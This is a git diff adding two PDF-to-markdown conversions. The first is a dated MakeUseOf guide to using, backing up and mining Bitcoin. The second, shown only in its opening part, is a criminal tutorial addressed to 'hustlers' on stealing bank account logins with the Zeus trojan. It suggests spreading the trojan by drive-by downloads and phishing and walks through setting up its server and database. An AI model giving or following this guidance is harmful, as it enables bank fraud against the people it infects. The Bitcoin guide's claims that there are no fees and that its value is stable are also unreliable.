+Creating a BTC Guild Account .................................................................................... 19
+Creating a Worker .......................................................................................................... 20
+Configuring DiabloMiner ............................................................................................... 20
+Conclusion .............................................................................................................................. 21
+http://lachlanroy.com | Lachlan Roy
+Pa g e 3
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Introduction
+Cash is great.
+There are no banks to worry about. No fees, no credit cards, no chance of having
+your identity stolen or your account frozen. You may not earn any interest, but you
+always have instant access to your money and you know exactly how much you
+have.
+It‟s also great for when you need to give money to someone else. There‟s no forms
+to fill out or confusing account numbers. There are no fees to worry about. You don‟t
+need to deal with a middleman. You just hand over the money and that‟s it.
+Then the Internet happened. Great services like eBay and web stores let you do your
+research at home and then buy exactly what you need without having to hunt for it
+in brick and mortar stores. All well and good, but suddenly cash isn‟t cutting it any
+more. After all, it‟s hard to hand someone a few notes and coins when they live on
+the other side of the world.
+Wouldn‟t it be great to be able to use cash on the Internet, too? To have the ability
+to store your own money on your own computer? To buy what you need online
+without dealing with banks and middlemen?
+That‟s where BitCoin comes in. Cash for the Internet is here.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 4
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+BitCoin: The Virtual Currency
+What is BitCoin?
+BitCoin is a new, all-digital, peer-to-peer (p2p) currency,
+which can be used to replace cold, hard cash when
+buying and selling goods and services online.
+Unlike most money online, which is stored in banks and
+transferred using payment processors like PayPal, BitCoin is
+completely distributed between its users and sent between
+users without the need for a middleman.
+Why should I use BitCoin?
+There are a few major advantages to using BitCoin in place of your normal currency
+for online transactions, most of which stem from how BitCoins are stored.
+First of all, BitCoin is a global, decentralised currency. This means that there is no
+country to which BitCoin specifically belongs, making it a viable currency to use all
+over the world. This makes international transactions simple; no longer does there
+need to be a discussion over whether the payment should be made in the buyer‟s
+currency or the seller‟s, nor at which exchange rate the transaction should take
+place.
+Another big advantage that decentralised currencies have is that a Federal Reserve
+or national bank does not manage the value of the currency. This means that the
+currency will retain its value regardless of the performance of the global economy,
+similar to the value of rare metals and commodities like oil. It has no single point of
+failure; the entire Internet would have to go down for BitCoin to fail.
+Second, because transactions are made directly from one person to another, there
+is no middleman, and therefore no fees. In a few years time there will be a slight
+charge for transactions due to the way that the currency is managed, but it should
+be much less than the standard alternatives.
+Third, because the BitCoins you own are stored in a wallet file on your computer, you
+have full control over your funds. Since the BitCoins are not stored in an “account”
+they cannot be frozen, meaning that you will never be left without cash.
+Furthermore, there is no “small print”, transaction limits, forms or other limits like you
+would have with a bank.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 5
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Finally, while it does cost money to exchange fiat currencies to BitCoins and vice
+versa, it doesn‟t cost anything to accept them, making it a great way to be paid
+online for goods or services.
+Some downsides to using BitCoin
+Of course, like all things, there are some downsides to using BitCoins, which may
+mean that using them is not for you. It‟s worth giving it some thought before rushing
+in.
+First of all, because you hold on to the money and don‟t store it in a bank, you won‟t
+earn any interest on any money stored as BitCoins. While to most people this isn‟t a
+major problem (since you‟re likely only using BitCoins to send to somebody else), if
+you‟re a merchant dealing in BitCoins, not collecting interest could have significant
+implications.
+Reliability is also a major issue. While in theory its internet-wide distribution should
+make the currency stable, it is still potentially susceptible to shocks in supply or
+demand, which could cause rapid changes in its value. It‟s important to remember
+that BitCoin is a fledgling currency that has only been around for a couple of years
+and is one of the first of its kind, so there‟s no real way to tell how successful it will be.
+Furthermore, while its decentralised nature can be advantageous, it does also mean
+that if something does go horribly wrong there‟s no bank or government to back it
+up.
+Simply put: BitCoins could be worthless someday.
+Another problem is the way that money is sent from peer to peer. While it is possible
+to create more complex transaction systems for BitCoin, the simple transfers that
+make up the majority of BitCoin transactions have no set securities. That basically
+means that all transactions are final and there are no refunds, making it great for
+scammers; once the money is gone, it‟s almost impossible to get it back without the
+other party returning it voluntarily. There is no bank or credit card company to
+appeal to.
+The other main downsides to using BitCoins come down to the disadvantages it
+shares with physical cash - its ability to be lost or stolen. As the BitCoins are stored in a
+simple file called a wallet file, they can be at risk to hackers and viruses that can
+transfer the money from your wallet to theirs (which, again, is almost impossible to
+reverse due to the nature of transactions). However, it‟s a fairly simple and
+straightforward process to secure your wallet file - we‟ll touch on that later.
+While it is quite difficult to “lose” the wallet file in the same way you might lose your
+real wallet, there are still the possible dangers of file corruption, hard drive failure
+http://lachlanroy.com | Lachlan Roy
+Pa g e 6
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+and accidental deletion. Since the only record of the BitCoins you own is the wallet
+file that they‟re stored in, losing the wallet means losing the BitCoins.
+Again, this is fairly easy to safeguard against, and we‟ll be looking at a few different
+methods a bit later.
+So, now you know the risks involved. There are a few, to be sure, but most are easily
+avoided.
+How to use BitCoin
+Getting a BitCoin wallet
+The first step to getting started with BitCoins is to get yourself a BitCoin wallet. Just like
+a real wallet, this is where your BitCoins are stored. It is far more tangible than money
+stored in a bank account – the wallet file you create is a file just like any other
+document. It can be moved around and stored on different devices. You can even
+duplicate it to have multiple copies (obviously this doesn‟t duplicate the money
+inside, though!).
+Your BitCoin wallet is comprised of two parts: the wallet file, which stores the BitCoins,
+and the wallet application (also called the BitCoin client), which opens those wallet
+files. This means that it is possible to store the wallet file on a USB drive (for example)
+and open it on any computer that has the wallet application installed. As there is a
+version for most operating systems, it‟s possible to open the BitCoin file pretty much
+anywhere.
+You can download the official client from the BitCoin website (www.bitcoin.org).
+There you can get the right version for your operating system.
+For Windows and OS X, installing the wallet application is just like installing any other
+application for your platform. I‟ll assume that you already know how to do this.
+Opening the application will generate the wallet file and assign you your first
+receiving address (more on this in a bit).
+For Ubuntu, downloading the client gives you a .tar.gz file which contains four
+different versions: the main application and the windowless server in both 32-bit and
+64-bit flavours. You can put this folder anywhere and then click on bitcoin to start
+the program.
+Alternatively, instead of installing the BitCoin client, you can choose to use an online
+service such as Instawallet (www.instawallet.org). This site generates a wallet file and
+ties it to a specific URL which you can save as a bookmark. This allows you to access
+http://lachlanroy.com | Lachlan Roy
+Pa g e 7
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+your BitCoins from pretty much anywhere, but means that you have to trust the
+service with your BitCoins.
+Have a look at the BitCoin client window. This is the Mac version, but like most cross
+platform applications it‟s pretty much the same for every version.
+That‟s all there is to it. Pretty simple, right?
+Filling your wallet
+Now it‟s time to put some „Coins‟ in that wallet. There are three main ways to add
+BitCoins to your wallet file: donations and free BitCoins, currency exchange, and
+BitCoin trading (or becoming a BitCoin merchant). Each one is fairly self-explanatory,
+but we‟ll go a bit more in-depth anyway.
+Before that, though, it‟s time to introduce some new terminology. BitCoins are sent to
+your wallet via a receiving address, which is a long string of randomly generated
+characters that points to your wallet file. The process is similar to the sender writing a
+cheque for a certain amount, although the process is all automatic and the cheque
+doesn‟t need to be manually cashed in.
+Interestingly, you don‟t need to use a single receiving address forever; on the
+contrary, it is generally recommended that you create a new receiving address for
+each expected transaction so that it is easier to track individual payments. All
+previous receiving addresses remain valid and active, so it is possible for old
+receiving addresses to be reused again and again.
+You can also fill your wallet through BitCoin mining - we‟ll be dealing with this later.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 8
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Donations/Free BitCoins
+As you may have guessed, this section deals with free BitCoins from websites and
+from other individuals. While the BitCoins you‟ll get for nothing are few and far
+between (and usually far less than a whole BitCoin), it‟s still something to get you
+started and to help you understand how BitCoin transactions work.
+The best place to get your first free BitCoin (or a percentage thereof) is to head over
+to the BitCoin Faucet (https://freebitcoins.appspot.com/), which gives out 0.001BTC
+to new BitCoin users. You‟ll need a Google account of some description (typically
+your Google Mail or Google+ account, although you can sign up for a free Google
+account using a different email address) – a countermeasure put in place to
+prevent a few people from abusing the free money.
+Once you‟ve logged in with your Google account, you‟ll need to solve a captcha
+(a puzzle used to prove that you‟re not a robot), then enter your receiving address
+before clicking “Get Some!”.
+That‟s it! It may take up to 10 minutes for the payment to come through, as the
+BitCoin Faucet bundles payments together to reduce load on the network, but then
+you should see 0.001 BitCoins show up in your wallet.
+Donations work much in the same way. You can put a receiving address pretty
+much anywhere; on your FaceBook or Google+ profile, on forums, in email
+http://lachlanroy.com | Lachlan Roy
+Pa g e 9
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+signatures or even in real life. That way, if somebody has some spare „Coins and
+wants to thank you for something it‟s just a case of sending a BitCoin or so to your
+receiving address.
+A typical example of a receiving address placed in a forum signature
+Currency Exchange
+Although free BitCoins are awesome, it doesn‟t give you a whole lot to work with.
+The easiest solution is to exchange your currency for some BitCoins. There are a
+number of websites you can use to do this, though you‟ll need to make sure that the
+website you choose will handle your particular currency (otherwise you‟ll end up
+exchanging money twice, with transaction fees and all)!
+For a list of the BitCoin exchange sites and the currencies they support, there‟s a
+page over at the BitCoin wiki (https://en.bitcoin.it/wiki/Trade).
+There are two main types of currency exchange: real time and fixed-rate. Real time
+trading is where the buyer lists the maximum price they are willing to pay for each
+BitCoin, while the seller lists the minimum price they are willing to sell each BitCoin for.
+Trade instantly happens when these two prices overlap. In this scenario it is possible
+to get a great exchange rate, although this can require some patience.
+Fixed-rate exchange, on the other hand, is much closer to your standard foreign
+exchange transaction: a company will offer a rate which is fixed for a certain period
+of time, and will exchange any quantity of fiat currency for BitCoins at a standard
+rate. While you won‟t get as good a deal as if you‟re patient in real time trading,
+fixed-rate exchange is more reliable and instantaneous.
+The most popular exchange website by far is Mt Gox (www.mtgox.com), which is
+responsible for over 80% of BitCoin transactions using the real time model.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 10
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+BitCoin Trading
+The other main way to get BitCoins is to earn them by providing goods or services
+online and accepting BitCoins as payment. From obvious things like web design and
+app development to crazy things like ordering pizza for someone, dictating 500
+words or writing a song, pretty much anything can potentially earn you BitCoins.
+If you want to sell physical objects, you can use websites such as the BitCoin World
+Market (http://www.bitcoinworldmarket.com) which pays you in BitCoins or other
+currencies.
+Conversely, if you already run a business online, accepting BitCoins is really easy.
+You can read more about this by looking at the article on the BitCoin Wiki
+(https://en.bitcoin.it/wiki/How_to_accept_Bitcoin,_for_small_businesses) then post a
+link on the Trade page (http://en.bitcoin.it/wiki/Trade) so that people can find your
+website!
+Finally, if you want to sell a one off item or provide a service, look no further than the
+site For BitCoin (http://www.forbitcoin.com), which will let you say what you‟ll do for
+BitCoins and how much you want for the trouble. It‟s a simple idea, but one that
+works really well.
+Spending BitCoin
+Funnily enough, finding something to spend your hard earned BitCoins on is just a
+case of going to the same places you can use to earn BitCoins.
+The best place to start is the BitCoin Wiki‟s Trade Page
+(http://en.bitcoin.it/wiki/Trade), which provides a list of all the known websites that
+accept BitCoins for goods or services.
+All BitCoin transactions involve a sending address and a receiving address. When
+you earn BitCoins you give somebody your receiving address; to spend BitCoins,
+you‟re provided a receiving address to send BitCoins to.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 11
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Sending BitCoins is easy. Just click on the “Send Coins” button in the client window.
+Then, in the resulting “Send Coins” window, enter the Receiving Address you want to
+send the coins to, specify an amount and click “Send”. That‟s it!
+Securely Sync Your BitCoins
+Since you‟re looking after your money yourself, and there‟s no built-in backup in
+case something goes horribly wrong and your money is lost or stolen, it‟s important
+that you keep your BitCoin wallet locked up and backed up.
+To achieve this, we‟ll be making use of two separate, free, cross-platform programs
+that we‟ve extensively covered in the past: TrueCrypt and DropBox.
+The process is largely the same regardless of platform, although each operating
+system does have a slightly different place that it stores the BitCoin files. We‟ll quickly
+run through each one, and I‟ll assume you know what you‟re doing with TrueCrypt
+and DropBox and that you already have them installed and ready to go. If you
+haven‟t come across them before, I strongly suggest that you go and read the
+MakeUseOf PDF guides for each.
+Bear in mind, though, that some of the steps involved are quite advanced. If you‟re
+not at all confident in your abilities with a computer, I‟d suggest leaving this bit
+alone. As a general rule, if you have no idea where or what the Terminal is, you
+probably shouldn‟t be using it.
+Windows
+First up, you‟ll want to make a Virtual Encrypted Disk using TrueCrypt. Just use the
+basic settings, and don‟t worry about making a dynamic disk – you really don‟t want
+anything going wrong with it! Ideally the VED should be around 100MB in size to
+accommodate any large increases in file size in the future. Save the VED file to
+DropBox so that it‟s automatically backed up!
+Before we start working with the files, start up BitCoin and take note of the receiving
+address. We can use this to verify that it is using the data properly.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 12
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Once you‟ve done that, it‟s just a case of finding the folder where the BitCoin client
+stores all its files (including your wallet file). You can usually find this by going to Start
+> Run (or by pressing WinKey + R and typing in the following:
+explorer %APPDATA%\Bitcoin
+This is the default location for BitCoin data:
+C:\Documents and Settings\YourUserName\Application data\Bitcoin (XP)
+C:\Users\YourUserName\Appdata\Roaming\Bitcoin (Vista and 7)
+Once you‟ve found the folder, copy the entire folder into the VED that you created
+earlier. Take note of the drive letter you assign to the VED – you‟ll be using this in a bit
+when you tell BitCoin where to look for its data. For this example we‟ll assume that
+the drive you have selected is the E: drive.
+Once you‟ve copied the files over, create a temporary backup of the file, then
+delete the original file from the Appdata folder. This will force the BitCoin client to use
+the VED as a source if everything has been done correctly, otherwise it will simply
+create a new folder to replace the one that was deleted.
+Now that you‟ve finished moving files around, you can create a new shortcut to start
+the BitCoin application. Find BitCoin in your Start Menu, right click the shortcut and
+choose “Send to > Desktop (create shortcut)”. Then right click the shortcut you just
+edited and click “Properties…” and enter in the following in the “Target” field:
+C:\Program Files\Bitcoin\bitcoin.exe -datadir=E:\Bitcoin
+Don‟t forget to change E: to the drive letter you assigned the VED. Also, if you‟re
+using a 64-bit version of Windows, you‟ll need to change
+C:\Program Files\ to C:\Program Files (x86)\
+The first part of the Target string (starting with C:\Program Files\) is the location of
+the BitCoin client application, but not the wallet file or the files it works with. The –
+datadir switch basically tells BitCoin to load all its files from E:\BitCoins instead of
+the default file location in the AppData folder.
+With that done, it‟s just a matter of double clicking that shortcut to use BitCoin from
+the secure Virtual Encrypted Drive. Just make sure that you‟ve mounted the VED
+before you start the BitCoin client, and that you always mount it to the same drive
+letter.
+At this point we can start up the BitCoin client and check to see whether we have
+the same receiving address as the one we started with. If we do, it‟s been successful.
+If not, don‟t worry! Just try going through the steps again.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 13
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Mac OS X
+If you‟re using OS X 10.6 or 10.7 (Snow Leopard or Lion), you‟ll need to install a free
+system utility called MacFUSE first that provides the software necessary to create
+VEDs using TrueCrypt. It uses a standard .pkg installation process, so you shouldn‟t
+run into any problems at all. When that‟s installed, we can get started properly.
+Create a Virtual Encrypted Disk (VED) using TrueCrypt. Just use all the default
+settings, enter a secure password and save it in your DropBox folder. You‟ll want to
+allocate around 100MB to the VED to make sure that you don‟t run out of room
+down the line.
+After creating the VED, mount it using TrueCrypt. This will mount a volume which
+looks just like when you mount a .dmg file to install an application. By default this will
+be called NO NAME – right click this in the Finder sidebar and rename it to something
+a bit more intuitive, such as BITCOIN (FAT, the file system used by the VED requires
+the name to be in capital letters).
+Before doing anything to the BitCoin files, open up BitCoin and take note of your
+receiving address. We can use this to verify whether the symbolic link has worked
+correctly.
+By default, the files needed by the BitCoin client are stored in the following location:
+~/Library/Application Support/Bitcoin
+The ~ means your home folder, not the root Library folder – these are two different
+folders which contain different data. Make sure you look in the right one! When you
+find it, copy the entire BitCoin folder to the VED and then delete the folder in
+Application Support. You‟ll probably want to copy it to your Desktop as a failsafe
+in case something goes wrong, too.
+Now it‟s time to create a symbolic link to trick OS X into thinking that the folder is still
+there in Application Support, even though it‟s now in the VED. To do this, we‟ll
+need to start up a Terminal window, and enter in the following:
+ln -s /Volumes/BITCOIN/Bitcoin ~/Library/Application Support/Bitcoin
+Where BITCOIN is the name you gave to the VED when it‟s mounted.
+That‟s the last step! Now you can start up the BitCoin client and it will take its data
+from the VED. Make sure you mount the VED before starting the BitCoin client,
+though – if you start the client without mounting the VED, it will create a new
+Bitcoin folder in Application Support and remove the symbolic link. If this
+happens, just delete the folder in Application Support, mount the VED and
+create the symbolic link again using the same command.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 14
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Now we can start up the BitCoin client and check to see whether we have the same
+receiving address as the one we started with. If so, it‟s all done and working great.
+Ubuntu
+First up, create a Virtual Encrypted Disk (VED) using TrueCrypt. Just use all the default
+settings, use a secure password and save it in your DropBox folder. You‟ll want to
+allocate around 100MB to the VED to make sure that you don‟t run out of room
+down the line.
+When you‟ve created the VED, use TrueCrypt to mount it. When you choose a slot to
+mount the VED, it will mount it in /media/truecrypt, where is the number
+of the slot you chose. For this example, we‟ll assume you‟ve chosen slot 1, in which
+case the mount point would be /media/truecrypt1.
+Before doing anything to the BitCoin files, open up BitCoin and take note of your
+receiving address. We can use this to verify whether the symbolic link has worked
+correctly.
+By default BitCoin files are stored in the folder ~/.bitcoin, where ~ is the root of
+your home folder. As files starting with “.” are hidden by Ubuntu, you‟ll need to
+unhide the folder by pressing Ctrl + H. Then move (Ctrl + X to cut, Ctrl + V
+to paste) the entire .bitcoin folder to the VED, which acts just like a memory stick.
+Once the files have been moved, we just need to make a symbolic link to point the
+BitCoin client to the VED when it‟s looking for its files. We do this by opening up a
+Terminal window (Applications > Accessories > Terminal) and entering the following:
+ln –s /media/truecrypt1/.bitcoin ~/.bitcoin
+All done! If you go and start the BitCoin client again, you should notice that your
+receiving address is the same as before. This means that you‟ve done everything
+successfully and it is ready to use.
+Make sure you mount the VED before starting the BitCoin client, though – if you start
+the client without mounting the VED, it will create a new .bitcoin folder in your
+home folder and remove the symbolic link. If this happens, just delete the .bitcoin
+folder in your home folder, mount the VED and create the symbolic link again using
+the same command you used before.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 15
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+BitCoin Mining
+Before we start to talk about this, I should point out that very few people mine for
+BitCoins. You don‟t need to mine to use BitCoins; people who mine usually either do
+it for fun or are prepared to take a risk with a business that is very likely to make less
+than invested.
+What is BitCoin Mining?
+Although BitCoin is a distributed, peer-to-peer currency, it has to have a set
+capacity for it to retain its value. For this reason, there will be a total of just under 21
+million BitCoins available for circulation.
+However, if 21 million BitCoins were to become available all at once and there
+wasn‟t enough demand for them, the BitCoins would be essentially worthless. For this
+reason, the rate of new BitCoins entering circulation must be tightly controlled so
+that BitCoins do not flood the market, instead being introduced gradually over the
+next 100 years or so. This is where BitCoin mining comes in.
+BitCoin mining is the process of using a computer to generate blocks, which are
+used to process and verify the transactions which occur between the time the block
+was generated and the time the previous block was generated. Blocks contain data
+from the previous block so as to create a block chain, which contains information
+about every transaction within the chain.
+Creating a block requires a lot of work, which translates to a lot of time and a lot of
+computer processing power. So, as an incentive, anybody who successfully creates
+a block is given a reward (currently 50BTC, worth roughly 500 USD at the time of
+writing) as well as any transaction fees included in the transactions hashed in the
+block.
+Total BitCoins over time
+http://lachlanroy.com | Lachlan Roy
+Pa g e 16
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+There are a few catches, though. The network is designed to maintain a block
+production rate of a new block every 10 minutes (or 6 blocks an hour). As more
+people begin to mine with more powerful computers, the difficulty is adjusted so
+that it takes longer for a block to be produced (making it harder for each individual
+to be the producer of a block).
+The other catch is that the reward for each block produced is halved every 210,000
+blocks. Currently there are around 142,000 blocks in existence, so it will be a while
+before the reward amount falls. When it does reach 210,000 blocks, though, the
+reward will drop to 25BTC. When 420,000 blocks have been produced, the reward
+will fall to 12.5BTC, and so on and so forth.
+Once the 21 million BitCoins have been produced there will no longer be a reward,
+although the producer of the block will still receive all transaction fees for that block
+(which, by this point, will be significant enough to be a reward in itself).
+What do I need to mine BitCoins?
+At its most basic, all you need for BitCoin mining is a computer with a BitCoin mining
+application and an Internet connection. Having said that, there‟s a difference
+between mining BitCoins and mining BitCoins well. The applications used for mining
+BitCoins make use of your graphics card, which can carry out many calculations at
+the same time (far more than possible with even the best CPUs). Put simply, more
+powerful graphics cards can carry out more calculations at once and carry them
+out faster.
+BitCoin mining performance is measured in hashes per second (hash/s), or the
+number of times the graphics card can convert the data supplied to it into a fixed-
+length string of characters. When a hash is generated with the correct value a block
+is created, so the higher the hash/s value of the graphics card, the faster it is likely to
+create a new block.
+Most mid-range desktop graphics cards today (such as the AMD 6750 for $120) are
+capable of producing around 170Mhash/s (Megahashes per second) - that‟s 170
+000 000 hashes per second.
+On the flip side, some people build servers made specifically for BitCoin mining.
+These may have 3 or 4 of the most powerful graphics cards currently available,
+which working together are able to produce over 2Ghash/s (Gigahashes per
+second) - that‟s more than 2 000 000 000 hashes every second.
+Having said that, you can still successfully mine by using the graphics card in your
+computer, although upgrading it to a more powerful graphics card to improve
+performance can still be beneficial.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 17
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+To mine using a Mac you really want to be running Snow Leopard or later – earlier
+versions of OS X can‟t make use of the graphics card and are too slow to be worth
+the hassle.
+How do I mine BitCoins?
+Mining for BitCoins is really easy, and just needs to be set up then left to mine. First
+you‟ll need to choose how you want to mine. It boils down to two options: mining by
+yourself, or mining as part of a pool (where you pool your computer‟s work with
+other members and split the rewards when a block is produced).
+If you mine by yourself, you‟ll get to keep 100% of everything you earn. Just bear in
+mind that there‟s no way of knowing if and when you‟ll produce a block.
+Conversely, working for a pool means that you‟ll get a steadier income (as the pool
+is more likely to produce more blocks than you are by yourself), but you‟ll sacrifice
+some of your earnings to the person running the mining pool.
+In this guide I‟ll be showing you how to start mining for yourself, and also for mining in
+the BTC Guild mining pool. If you‟re using Windows or Ubuntu, Danny Stieben has
+written a great guide to get you started over on the main MakeUseOf site.
+For OS X we‟ll be using the DiabloMiner.app, a frontend for the command-line
+BitCoin miner DiabloMiner. You can download the latest version from this thread on
+the BitCoin Talk Forum. Make sure you select the DiabloMiner version, not the
+RPCMiner version (which uses the CPU instead of the GPU and is much slower as a
+result).
+Solo Mining
+Configuring the BitCoin Client
+Before we can start mining, we need to set up the client to act as a server that
+communicates with the BitCoin network so that we can mine by ourselves. This
+involves editing a file called bitcoin.conf (or creating one if it doesn‟t already
+exist). This is stored in the Application Support folder, along with the other BitCoin
+files.
+First, browse to the Application Support folder to see if there is already a
+bitcoin.conf file. If there is, open it with TextEdit. If it isn‟t, we‟ll open TextEdit
+anyway to create the file.
+When we have TextEdit open, make sure that you‟re working in Plain Text mode (as
+formatting plays havoc with program files) by pressing cmd+shift+T. Then enter the
+following text:
+rpcuser=username
+http://lachlanroy.com | Lachlan Roy
+Pa g e 18
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+rpcpassword=password
+rpcport=8332
+server=1
+You can change the username and password if you wish; for solo mining it doesn‟t
+really matter at all either way. rpcport is the port which BitCoin uses for uploading
+and downloading new block information, and server=1 makes BitCoin enables
+server functions allowing us to mine without connecting to a pool. Save the file; if
+you‟re creating it from scratch, make sure to disable “If no extension is provided, use
+.txt”.
+Now you can start BitCoin and it will automatically start up the server in the
+background. When this happens it will start to download all the previous blocks it
+can find, which can take a very long time. This can affect DiabloMiner, so you‟ll
+need to wait for it to finish.
+Configuring DiabloMiner
+When you start DiabloMiner for the first time, you‟ll be greeted with the set-up wizard.
+These are the settings you‟ll want to enter:
+Server host name or IP address: localhost
+Server port number: 8332
+Miner username: username (or whatever username you chose)
+Miner password: password (or whatever password you chose)
+Start mining automatically on log-in? No (so you can change
+settings)
+That‟s it! DiabloMiner will take care of the rest. However, if you see an error like:
+ERROR: Can't connect to Bitcoin: Bitcoin returned error message:
+Bitcoin is downloading blocks...
+It‟s because the BitCoin client hasn‟t finished getting set up yet. Unfortunately there‟s
+no easy way to tell when it‟s ready, so you‟ll just have to wait and try again later.
+Mining Pool (BTC Guild)
+Creating a BTC Guild Account
+The first step to mining in a pool is creating an account with the mining pool. This is
+usually done through the pool‟s website – in this case http://www.btcguild.com.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 19
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Creating an account is just like creating an account on any website. There‟s a link
+for creating an account on the left hand side of the page under the login box. Just
+choose a username and password and then click “Register”. You‟ll instantly be
+logged in with the username you just chose; there‟s no confirmation email to worry
+about.
+Creating a Worker
+The next step is to create a worker account – each computer used for BitCoin
+mining needs its own login (which allows you to set up multiple computers all mining
+under your one main username).
+If you don‟t have any workers yet, red text will appear at the top of the screen telling
+you to set up a new worker. It‟s a link; click it and you will be taken to the Worker
+page which allows you to add a new worker.
+Creating a new worker just involves providing a worker name (which is in the form of
+yourusername_workername where yourusername is your BTC Guild username) and
+a password for that particular worker (we‟ll refer to it as worker_password).
+Configuring DiabloMiner
+When you start DiabloMiner for the first time, you‟ll be greeted with the set-up wizard.
+These are the settings you‟ll want to enter:
+Server host name or IP address: uscentral.btcguild.com
+Server port number: 8332
+Miner username: yourusername_workername
+Miner password: worker_password
+Start mining automatically on log-in? No (so you can change
+settings)
+All done! You should see text to the effect of:
+[8/23/11 2:31:08 AM] Started
+[8/23/11 2:31:08 AM] Connecting to:
+http://uscentral.btcguild.com:8332/
+[8/23/11 2:31:08 AM] Added ATI Radeon HD 6750M (#1) (5 CU, local
+work size of 256)
+Waiting...
+http://lachlanroy.com | Lachlan Roy
+Pa g e 20
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+59005/62050 khash/s
+When you see that last number you know that you have successfully connected and
+you have started mining. Congratulations!
+You‟ll want to give it a while – a few days, maybe more – before you collect any
+payouts. At that point you can supply your receiving address to the pool website
+and they will transfer your earnings straight to your wallet. Simple!
+Conclusion
+BitCoins are great.
+There are no banks to worry about. No fees, no credit cards, no chance of having
+your identity stolen or your account frozen. You may not earn any interest, but you
+always have instant access to your money and you know exactly how much you
+have.
+They‟re also great for when you need to give money to someone else. There‟s no
+forms to fill out or confusing account numbers. You don‟t need to deal with a
+middleman. You just send some BitCoins to their Receiving Address and that‟s it.
+Then the Internet happened. Web stores let you do your research at home and then
+buy exactly what you need without having to hunt for it in brick and mortar stores.
+After all, it‟s easy to send someone a few BitCoins, even if they live on the other side
+of the world. If you‟re the one selling, it‟s even easier to receive them.
+Even if you‟re not selling, you can still conjure BitCoins out of the cryptographic soup
+that is the hash, block and block-chain system that makes BitCoins tick using nothing
+but a computer with a discrete graphics card.
+Isn‟t it great to be able to use cash on the Internet, too? To have the ability to store
+your own money on your own computer? To buy what you need online without
+dealing with banks and middlemen?
+Yeah. It is, and BitCoin makes it possible.Did you like this PDF Guide? Then why not
+visit MakeUseOf.com for daily posts on cool websites, free software and internet tips.
+http://lachlanroy.com | Lachlan Roy
+Pa g e 21
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Did you like this PDF Guide? Then why not visit MakeUseOf.com for daily posts on
+cool websites, free software and internet tips.
+If you want more great guides like this, why not subscribe to MakeUseOf and receive
+instant access to 20+ PDF Guides like this one covering wide range of topics.
+Moreover, you will be able to download free Cheat Sheets, Free Giveaways and
+other cool things.
+Subscribe to MakeUseOf : http://www.makeuseof.com/join
+MakeUseOf Links:
+Home: http://www.makeuseof.com
+MakeUseOf Directory: http://www.makeuseof.com/dir
+MakeUseOf Answers: http://www.makeuseof.com/answers
+Geeky Fun: http://www.makeuseof.com/tech-fun
+PDF Guides: http://www.makeuseof.com/pages/
+Tech Deals: http://www.makeuseof.com/pages/hot-tech-deals
+Follow MakeUseOf:
+RSS Feed: http://feedproxy.google.com/Makeuseof
+Newsletter: http://www.makeuseof.com/join
+Facebook: http://www.facebook.com/makeuseof
+Twitter: http://www.twitter.com/Makeuseof
+http://lachlanroy.com | Lachlan Roy
+Pa g e 22
+MakeUseOf.com
+
+Virtual Currency: The BitCoin Guide
+Download Other MakeUseOf PDF Guides!
+Like us to download: http://makeuseof.com/pages
+http://lachlanroy.com | Lachlan Roy
+Pa g e 23
+MakeUseOf.com
diff --git a/zeus-guide_pdf.md b/zeus-guide_pdf.md
new file mode 100644
index 0000000..5fa7d8c
--- /dev/null
+++ b/zeus-guide_pdf.md
@@ -0,0 +1,97 @@
+# zeus-guide
+
+
+---
+
+GUIDE TO STEAL BANK ACCOUNT LOGS
+USING ZEUS
+Dear hustlers, how are you all doing? Thank you for sending us the emails
+offering your support, we are overwhelmed with the amount of gratitude that
+you showed us in the last few weeks, today we have come forward to give you
+another 2021 priceless guide that you can use to steal bank account logins
+using nothing but Zeus, a remote administration tool AKA RAT.
+In this .com guide today you will learn how to set up a Remote Administration
+Tool Zeus (RAT).
+WHY DID WE CHOOSE ZEUS?
+We chose Zeus because Zeus is one of the famous trojan-horse in the history of
+viruses/malware that has infected many computers worldwide to steal banking
+
+information by Man-in-the-browser keystroke logging and the best part is the
+fact that you can spread Zeus through drive-by downloads and your phishing
+schemes.
+REQUIREMENTS:
+• Zeus Remote Administration Tool (RAT)
+• Web Server + Database Server (in this example we use XAMPP)
+ZEUS (RAT):
+Zeus attached in the folder, unzip and follow the guide!
+So once you have downloaded the ZIP To start with, we need to install the
+webserver and database server.
+Since we’re using XAMPP for this tutorial, you can google how to install XAMPP
+on your machine, we no longer bloat our articles with information that is
+already available and can be obtained with a simple google search, so do that
+first and install XAMPP with the database setup.
+Once your XAMPP setup is done, open your browser and type
+“http://localhost/phpmyadmin” to input the username and password, by
+default the username is “root” and the password is left empty.
+
+After that create a new database, we named it “bot” but you can change it
+into whatever you want. The database name will be used for the installation of
+Zeus (remote administration tool).
+In the next step, you need to download the Zeus remote administration tool file
+and extract it, you will find 3 main folder builders, other, and server[php].
